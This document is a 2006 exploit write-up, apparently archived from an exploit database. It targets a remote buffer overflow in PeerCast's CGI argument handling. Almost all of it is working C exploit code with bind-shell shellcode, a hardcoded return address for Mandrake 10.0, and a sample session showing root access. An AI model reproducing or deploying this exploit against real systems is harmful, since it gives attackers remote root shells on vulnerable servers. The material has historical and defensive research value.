PeerCast nextCGIarg Function Request Handling Remote Buffer Overflow Exploit #2
Source: http://unl0ck.net  Author: Darkeagle  Published: 2006-03-13

/*
\ PeerCast <=0.1216 remote exploit
/ by Darkeagle
\
/ 09.03.06
\
/
\ gr33tz: bl4ck guys, unl0ck guys, rst/ghc guys, 0x557 guys, ph4nt0m guys, sh0k and many otherz.
/
\
/ http://unl0ck.net

*******************************************
root@localhost darkeagle]# telnet localhost 36864
Trying 127.0.0.1...
Connected to localhost (127.0.0.1).
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root)
: command not found
uname -a;
Linux localhost 2.6.3-7mdk #1 Wed Mar 17 15:56:42 CET 2004 i686 unknown unknown GNU/Linux
: command not found
*******************************************

Special tnx goes to: Dr_UF0 for targets support :)

\
/
\
*/

#include <stdio.h>
#include <stdlib.h>      /* system(), exit(), atoi() */
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>  /* struct sockaddr_in, htons() */
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>


char scode[]= // binds 4444 port
"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
"\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5"
"\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c"
"\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c"
"\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86"
"\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7"
"\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f";

char linuxshellcode[]= // binds 36864 port
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x80\x43\xc6\x46\x10\x10\x88\x46"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
"\x80\x88\x56\x07\x89\x76\x0c\x87"
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";

void usage(char *proga)
{
printf("usage> %s <ipaddr> <port>\n", proga);
}

int main( int argc, char *argv[] )
{
int sock;
struct sockaddr_in addr;
char evil[1024], get[1024];

long retaddr = 0x438a3e3c; // mandrake 10.0 rus - peercast 0.1211.tgz


system("clear");
printf(".::: PeerCast <= 0.1215 remote exploit :::.\n");
printf(" by Darkeagle \n\n");
printf(" bug founder: Leon Juranic\n");
printf("\n keep private!!!\n");

if ( argc < 3 )
{
usage(argv[0]);
exit(0);
}

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[2]));
addr.sin_addr.s_addr = inet_addr(argv[1]);

printf("\nexp> connecting...\n");

if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) != 0 )
{
printf("exp> connection failed\n");
exit(0);
}

printf("exp> connection established!\n");

memset(evil, 0x00, 1024);
memset(get, 0x00, 1024);
memset(evil, 0x55, 800);                                  // 800 bytes of filler
//memcpy(evil+strlen(evil), &scode, sizeof(scode));
memcpy(evil+strlen(evil), &linuxshellcode, sizeof(linuxshellcode)); // shellcode appended after the filler

strcpy(get, "GET /stream/?");                             // the oversized CGI argument follows the '?'

*(long*)&evil[780] = retaddr;                             // target-specific return address at offset 780
strcat(evil, "\r\n\r\n");                                 // end of HTTP request
strcat(get, evil);

sleep(1);
printf("exp> sending evil data\n");
send(sock, get, strlen(get), 0);
printf("exp> done!\n");
printf("exp> check shell\n");
close(sock);
return 0;
}




 